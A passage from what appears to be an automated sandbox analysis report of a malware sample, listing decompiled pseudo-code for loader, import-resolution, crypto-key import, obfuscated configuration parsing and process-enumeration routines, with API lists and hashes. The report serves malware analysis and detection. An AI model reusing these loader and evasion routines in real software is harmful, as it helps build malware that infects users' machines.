            				_v20 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosw");
            				_t15 =  *0x47ea348; // 0xc3d5a8
            				_t4 = _t15 + 0x47eb3e8; // 0x5428990
            				_t20 = _t4;
            				_t6 = _t15 + 0x47eb174; // 0x650047
            				_t17 = E047E790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
            				if(_t17 < 0) {
            					_t23 = _t17;
            				} else {
            					_t23 = 8;
            					if(_v20 != _t23) {
            						_t23 = 1;
            					} else {
            						_t19 = E047E661C(_t20, _v12);
            						if(_t19 != 0) {
            							 *_a16 = _t19;
            							_t23 = 0;
            						}
            						__imp__#6(_v12);
            					}
            				}
            				return _t23;
            			}










            0x047e2843
            0x047e284a
            0x047e284b
            0x047e284c
            0x047e284d
            0x047e2853
            0x047e2858
            0x047e2858
            0x047e2862
            0x047e2874
            0x047e287b
            0x047e28a9
            0x047e287d
            0x047e287f
            0x047e2884
            0x047e28a6
            0x047e2886
            0x047e2889
            0x047e2890
            0x047e2895
            0x047e2897
            0x047e2897
            0x047e289c
            0x047e289c
            0x047e2884
            0x047e28b0

            APIs
              • Part of subcall function 047E790B: SysFreeString.OLEAUT32(?), ref: 047E79EA
              • Part of subcall function 047E661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,047E4B72,004F0053,00000000,?), ref: 047E6625
              • Part of subcall function 047E661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,047E4B72,004F0053,00000000,?), ref: 047E664F
              • Part of subcall function 047E661C: memset.NTDLL ref: 047E6663
            • SysFreeString.OLEAUT32(00000000), ref: 047E289C
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: FreeString$lstrlenmemcpymemset
            • String ID:
            • API String ID: 397948122-0
            • Opcode ID: b3ee12019f5fbf44f3a10e7530a1463a4eb02c51cc3be041ca219799f0f228d1
            • Instruction ID: aa077b9ea9ef1dab5c8d5dd0e04db8402c098dc9b5c2ee3da943c5ff71a198bf
            • Opcode Fuzzy Hash: b3ee12019f5fbf44f3a10e7530a1463a4eb02c51cc3be041ca219799f0f228d1
            • Instruction Fuzzy Hash: 7301B1B2500119BFDB81DFAACC04DAABBB8FF0C350F004665E902E7261E771A912C790
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryW.KERNELBASE(02B54000,00414A97), ref: 00414749
            Memory Dump Source
            • Source File: 00000000.00000002.523801722.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 60b703b22f914805831b0cf53231d61d5b884dcc1632bd1b8addb44175fccc55
            • Instruction ID: cc7f045297b93ef6274fd01b4fdcab6efc4b6845af6071ac66646583cad711a3
            • Opcode Fuzzy Hash: 60b703b22f914805831b0cf53231d61d5b884dcc1632bd1b8addb44175fccc55
            • Instruction Fuzzy Hash: 5FE09264A98360CAE70ADF10F5283113672FF14784FA8AC1D9159CF261E7B604F49B69
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E00401D3C(void* __eax, intOrPtr _a4) {
            
            				 *0x404190 =  *0x404190 & 0x00000000;
            				_push(0);
            				_push(0x40418c);
            				_push(1);
            				_push(_a4);
            				 *0x404188 = 0xc; // executed
            				L00401682(); // executed
            				return __eax;
            			}



            0x00401d3c
            0x00401d43
            0x00401d45
            0x00401d4a
            0x00401d4c
            0x00401d50
            0x00401d5a
            0x00401d5f

            APIs
            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: DescriptorSecurity$ConvertString
            • String ID:
            • API String ID: 3907675253-0
            • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
            • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
            • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
            • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004012E6(long _a4) {
            				void* _t2;
            
            				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
            				return _t2;
            			}




            0x004012f2
            0x004012f8

            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
            • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
            • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
            • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401BA9(void* _a4) {
            				char _t2;
            
            				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
            				return _t2;
            			}




            0x00401bb5
            0x00401bbb

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
            • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
            • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
            • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E004012FB(void* __eax) {
            				char _v8;
            				void* _v12;
            				void* __edi;
            				void* _t18;
            				long _t24;
            				long _t26;
            				long _t29;
            				intOrPtr _t40;
            				void* _t41;
            				void* _t42;
            				void* _t44;
            
            				_t41 = __eax;
            				_t16 =  *0x404180;
            				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
            				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
            				if(_t18 != 0) {
            					_t29 = 8;
            					goto L8;
            				} else {
            					_t40 = _v8;
            					_t29 = E00401BC4(_t33, _t40, _t41);
            					if(_t29 == 0) {
            						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
            						_t24 = E00401000(_t40, _t44); // executed
            						_t29 = _t24;
            						if(_t29 == 0) {
            							_t26 = E004014CF(_t44, _t40); // executed
            							_t29 = _t26;
            							if(_t29 == 0) {
            								_push(_t26);
            								_push(1);
            								_push(_t40);
            								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
            									_t29 = GetLastError();
            								}
            							}
            						}
            					}
            					_t42 = _v12;
            					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
            					E00401BA9(_t42);
            					L8:
            					return _t29;
            				}
            			}














            0x00401303
            0x00401305
            0x00401321
            0x00401332
            0x00401339
            0x00401397
            0x00000000
            0x0040133b
            0x0040133b
            0x00401345
            0x00401349
            0x0040134e
            0x00401351
            0x00401356
            0x0040135a
            0x0040135f
            0x00401364
            0x00401368
            0x0040136d
            0x0040136e
            0x00401372
            0x00401377
            0x0040137f
            0x0040137f
            0x00401377
            0x00401368
            0x0040135a
            0x00401381
            0x0040138a
            0x0040138e
            0x00401398
            0x0040139e
            0x0040139e

            APIs
              • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
              • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
              • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
              • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
            • GetLastError.KERNEL32(?,?), ref: 00401379
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
            • String ID:
            • API String ID: 3135819546-0
            • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
            • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			E047E5063(void* __ecx, void* __edx, void* _a4, void* _a8) {
            				void* _t13;
            				void* _t21;
            
            				_t11 =  &_a4;
            				_t21 = 0;
            				__imp__( &_a8);
            				_t13 = E047E1508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
            				if(_t13 == 0) {
            					_t21 = E047E33DC(_a8 + _a8);
            					if(_t21 != 0) {
            						E047E22EA(_a4, _t21, _t23);
            					}
            					E047E61DA(_a4);
            				}
            				return _t21;
            			}





            0x047e506b
            0x047e5072
            0x047e5074
            0x047e5083
            0x047e508a
            0x047e5099
            0x047e509d
            0x047e50a4
            0x047e50a4
            0x047e50ac
            0x047e50b1
            0x047e50b6

            APIs
            • lstrlen.KERNEL32(00000000,00000000,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E5074
              • Part of subcall function 047E1508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,047E5088,00000001,047E3ECE,00000000), ref: 047E1540
              • Part of subcall function 047E1508: memcpy.NTDLL(047E5088,047E3ECE,00000010,?,?,?,047E5088,00000001,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740), ref: 047E1559
              • Part of subcall function 047E1508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 047E1582
              • Part of subcall function 047E1508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 047E159A
              • Part of subcall function 047E1508: memcpy.NTDLL(00000000,76B5C740,05429600,00000010), ref: 047E15EC
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
            • String ID:
            • API String ID: 894908221-0
            • Opcode ID: e647c420634cbed2a76afdea96e966a64409197ecc08e79df8d4c9f7bac61ec5
            • Instruction ID: 11d7e9f8eb4bc0c02da0b66856ad5dc81005057f4eb015503e025df6f97a1ae2
            • Opcode Fuzzy Hash: e647c420634cbed2a76afdea96e966a64409197ecc08e79df8d4c9f7bac61ec5
            • Instruction Fuzzy Hash: B1F0547610010DBBDF126F96DC04DEA3B6DEF8C369B408511FD09CA210DA71E55597A0
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            C-Code - Quality: 93%
            			E047E1D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
            				int _v8;
            				void* _v12;
            				void* _v16;
            				signed int _t28;
            				signed int _t33;
            				signed int _t39;
            				char* _t45;
            				char* _t46;
            				char* _t47;
            				char* _t48;
            				char* _t49;
            				char* _t50;
            				void* _t51;
            				void* _t52;
            				void* _t53;
            				intOrPtr _t54;
            				void* _t56;
            				intOrPtr _t57;
            				intOrPtr _t58;
            				signed int _t61;
            				intOrPtr _t64;
            				signed int _t65;
            				signed int _t70;
            				void* _t72;
            				void* _t73;
            				signed int _t75;
            				signed int _t78;
            				signed int _t82;
            				signed int _t86;
            				signed int _t90;
            				signed int _t94;
            				signed int _t98;
            				void* _t101;
            				void* _t102;
            				void* _t116;
            				void* _t119;
            				intOrPtr _t122;
            
            				_t119 = __esi;
            				_t116 = __edi;
            				_t104 = __ecx;
            				_t101 = __ebx;
            				_t28 =  *0x47ea344; // 0x43175ac3
            				if(E047E10F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
            					 *0x47ea374 = _v8;
            				}
            				_t33 =  *0x47ea344; // 0x43175ac3
            				if(E047E10F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
            					_v12 = 2;
            					L69:
            					return _v12;
            				}
            				_t39 =  *0x47ea344; // 0x43175ac3
            				_push(_t116);
            				if(E047E10F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
            					L67:
            					HeapFree( *0x47ea2d8, 0, _v16);
            					goto L69;
            				} else {
            					_push(_t101);
            					_t102 = _v12;
            					if(_t102 == 0) {
            						_t45 = 0;
            					} else {
            						_t98 =  *0x47ea344; // 0x43175ac3
            						_t45 = E047E36C5(_t104, _t102, _t98 ^ 0x523046bc);
            					}
            					_push(_t119);
            					if(_t45 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
            							 *0x47ea2e0 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t46 = 0;
            					} else {
            						_t94 =  *0x47ea344; // 0x43175ac3
            						_t46 = E047E36C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
            					}
            					if(_t46 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
            							 *0x47ea2e4 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t47 = 0;
            					} else {
            						_t90 =  *0x47ea344; // 0x43175ac3
            						_t47 = E047E36C5(_t104, _t102, _t90 ^ 0x1b5903e6);
            					}
            					if(_t47 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
            							 *0x47ea2e8 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t48 = 0;
            					} else {
            						_t86 =  *0x47ea344; // 0x43175ac3
            						_t48 = E047E36C5(_t104, _t102, _t86 ^ 0x267c2349);
            					}
            					if(_t48 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
            							 *0x47ea004 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t49 = 0;
            					} else {
            						_t82 =  *0x47ea344; // 0x43175ac3
            						_t49 = E047E36C5(_t104, _t102, _t82 ^ 0x167db74c);
            					}
            					if(_t49 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
            							 *0x47ea02c = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t50 = 0;
            					} else {
            						_t78 =  *0x47ea344; // 0x43175ac3
            						_t50 = E047E36C5(_t104, _t102, _t78 ^ 0x02ddbcae);
            					}
            					if(_t50 == 0) {
            						L41:
            						 *0x47ea2ec = 5;
            						goto L42;
            					} else {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
            							goto L41;
            						} else {
            							L42:
            							if(_t102 == 0) {
            								_t51 = 0;
            							} else {
            								_t75 =  *0x47ea344; // 0x43175ac3
            								_t51 = E047E36C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
            							}
            							if(_t51 != 0) {
            								_push(_t51);
            								_t72 = 0x10;
            								_t73 = E047E5B85(_t72);
            								if(_t73 != 0) {
            									_push(_t73);
            									E047E607C();
            								}
            							}
            							if(_t102 == 0) {
            								_t52 = 0;
            							} else {
            								_t70 =  *0x47ea344; // 0x43175ac3
            								_t52 = E047E36C5(_t104, _t102, _t70 ^ 0x93710135);
            							}
            							if(_t52 != 0 && E047E5B85(0, _t52) != 0) {
            								_t122 =  *0x47ea3cc; // 0x5429600
            								E047E5364(_t122 + 4, _t68);
            							}
            							if(_t102 == 0) {
            								_t53 = 0;
            							} else {
            								_t65 =  *0x47ea344; // 0x43175ac3
            								_t53 = E047E36C5(_t104, _t102, _t65 ^ 0x175474b7);
            							}
            							if(_t53 == 0) {
            								L59:
            								_t54 =  *0x47ea348; // 0xc3d5a8
            								_t22 = _t54 + 0x47eb5f3; // 0x616d692f
            								 *0x47ea370 = _t22;
            								goto L60;
            							} else {
            								_t64 = E047E5B85(0, _t53);
            								 *0x47ea370 = _t64;
            								if(_t64 != 0) {
            									L60:
            									if(_t102 == 0) {
            										_t56 = 0;
            									} else {
            										_t61 =  *0x47ea344; // 0x43175ac3
            										_t56 = E047E36C5(_t104, _t102, _t61 ^ 0xf8a29dde);
            									}
            									if(_t56 == 0) {
            										_t57 =  *0x47ea348; // 0xc3d5a8
            										_t23 = _t57 + 0x47eb899; // 0x6976612e
            										_t58 = _t23;
            									} else {
            										_t58 = E047E5B85(0, _t56);
            									}
            									 *0x47ea3e0 = _t58;
            									HeapFree( *0x47ea2d8, 0, _t102);
            									_v12 = 0;
            									goto L67;
            								}
            								goto L59;
            							}
            						}
            					}
            				}
            			}








































            0x047e1d8a
            0x047e1d8a
            0x047e1d8a
            0x047e1d8a
            0x047e1d8d
            0x047e1daa
            0x047e1db8
            0x047e1db8
            0x047e1dbd
            0x047e1dd7
            0x047e2045
            0x047e204c
            0x047e2050
            0x047e2050
            0x047e1ddd
            0x047e1de2
            0x047e1dfa
            0x047e2032
            0x047e203c
            0x00000000
            0x047e1e00
            0x047e1e00
            0x047e1e01
            0x047e1e06
            0x047e1e1c
            0x047e1e08
            0x047e1e08
            0x047e1e15
            0x047e1e15
            0x047e1e1e
            0x047e1e27
            0x047e1e29
            0x047e1e33
            0x047e1e38
            0x047e1e38
            0x047e1e33
            0x047e1e3f
            0x047e1e55
            0x047e1e41
            0x047e1e41
            0x047e1e4e
            0x047e1e4e
            0x047e1e59
            0x047e1e5b
            0x047e1e65
            0x047e1e6a
            0x047e1e6a
            0x047e1e65
            0x047e1e71
            0x047e1e87
            0x047e1e73
            0x047e1e73
            0x047e1e80
            0x047e1e80
            0x047e1e8b
            0x047e1e8d
            0x047e1e97
            0x047e1e9c
            0x047e1e9c
            0x047e1e97
            0x047e1ea3
            0x047e1eb9
            0x047e1ea5
            0x047e1ea5
            0x047e1eb2
            0x047e1eb2
            0x047e1ebd
            0x047e1ebf
            0x047e1ec9
            0x047e1ece
            0x047e1ece
            0x047e1ec9
            0x047e1ed5
            0x047e1eeb
            0x047e1ed7
            0x047e1ed7
            0x047e1ee4
            0x047e1ee4
            0x047e1eef
            0x047e1ef1
            0x047e1efb
            0x047e1f00
            0x047e1f00
            0x047e1efb
            0x047e1f07
            0x047e1f1d
            0x047e1f09
            0x047e1f09
            0x047e1f16
            0x047e1f16
            0x047e1f21
            0x047e1f34
            0x047e1f34
            0x00000000
            0x047e1f23
            0x047e1f23
            0x047e1f2d
            0x00000000
            0x047e1f3e
            0x047e1f3e
            0x047e1f40
            0x047e1f56
            0x047e1f42
            0x047e1f42
            0x047e1f4f
            0x047e1f4f
            0x047e1f5a
            0x047e1f5c
            0x047e1f5f
            0x047e1f60
            0x047e1f67
            0x047e1f69
            0x047e1f6a
            0x047e1f6a
            0x047e1f67
            0x047e1f71
            0x047e1f87
            0x047e1f73
            0x047e1f73
            0x047e1f80
            0x047e1f80
            0x047e1f8b
            0x047e1f99
            0x047e1fa3
            0x047e1fa3
            0x047e1fab
            0x047e1fc1
            0x047e1fad
            0x047e1fad
            0x047e1fba
            0x047e1fba
            0x047e1fc5
            0x047e1fd8
            0x047e1fd8
            0x047e1fdd
            0x047e1fe3
            0x00000000
            0x047e1fc7
            0x047e1fca
            0x047e1fcf
            0x047e1fd6
            0x047e1fe8
            0x047e1fea
            0x047e2000
            0x047e1fec
            0x047e1fec
            0x047e1ff9
            0x047e1ff9
            0x047e2004
            0x047e2010
            0x047e2015
            0x047e2015
            0x047e2006
            0x047e2009
            0x047e2009
            0x047e2023
            0x047e2028
            0x047e202e
            0x00000000
            0x047e2031
            0x00000000
            0x047e1fd6
            0x047e1fc5
            0x047e1f2d
            0x047e1f21

            APIs
            • StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1E2F
            • StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1E61
            • StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1E93
            • StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1EC5
            • StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1EF7
            • StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1F29
            • HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 047E2028
            • HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 047E203C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uet
            • API String ID: 3298025750-2766386878
            • Opcode ID: f58bf8b4e1c3ccf00c95195871ce199089d86c4c7a167092491d6a3eabcf8309
            • Instruction ID: 8e027201e89a8e8372e9d239eb09454b7d243282f3510545f1602958bcd99cf6
            • Opcode Fuzzy Hash: f58bf8b4e1c3ccf00c95195871ce199089d86c4c7a167092491d6a3eabcf8309
            • Instruction Fuzzy Hash: 05813C70B10104ABD711EBB7DD89DBB77BDEB4C7047A48B25A501DB344EA39F9448760
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E047E30D5() {
            				char _v264;
            				void* _v300;
            				int _t8;
            				intOrPtr _t9;
            				int _t15;
            				void* _t17;
            
            				_t15 = 0;
            				_t17 = CreateToolhelp32Snapshot(2, 0);
            				if(_t17 != 0) {
            					_t8 = Process32First(_t17,  &_v300);
            					while(_t8 != 0) {
            						_t9 =  *0x47ea348; // 0xc3d5a8
            						_t2 = _t9 + 0x47ebe88; // 0x73617661
            						_push( &_v264);
            						if( *0x47ea12c() != 0) {
            							_t15 = 1;
            						} else {
            							_t8 = Process32Next(_t17,  &_v300);
            							continue;
            						}
            						L7:
            						CloseHandle(_t17);
            						goto L8;
            					}
            					goto L7;
            				}
            				L8:
            				return _t15;
            			}









            0x047e30e0
            0x047e30ea
            0x047e30ee
            0x047e30f8
            0x047e3129
            0x047e30ff
            0x047e3104
            0x047e3111
            0x047e311a
            0x047e3131
            0x047e311c
            0x047e3124
            0x00000000
            0x047e3124
            0x047e3132
            0x047e3133
            0x00000000
            0x047e3133
            0x00000000
            0x047e312d
            0x047e3139
            0x047e313e

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047E30E5
            • Process32First.KERNEL32(00000000,?), ref: 047E30F8
            • Process32Next.KERNEL32(00000000,?), ref: 047E3124
            • CloseHandle.KERNEL32(00000000), ref: 047E3133
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
            • String ID:
            • API String ID: 420147892-0
            • Opcode ID: 7c3016eb626c2beff235e8d9fbf8f22b60b3004b6a0caaf9dafe76e3f10a1e03
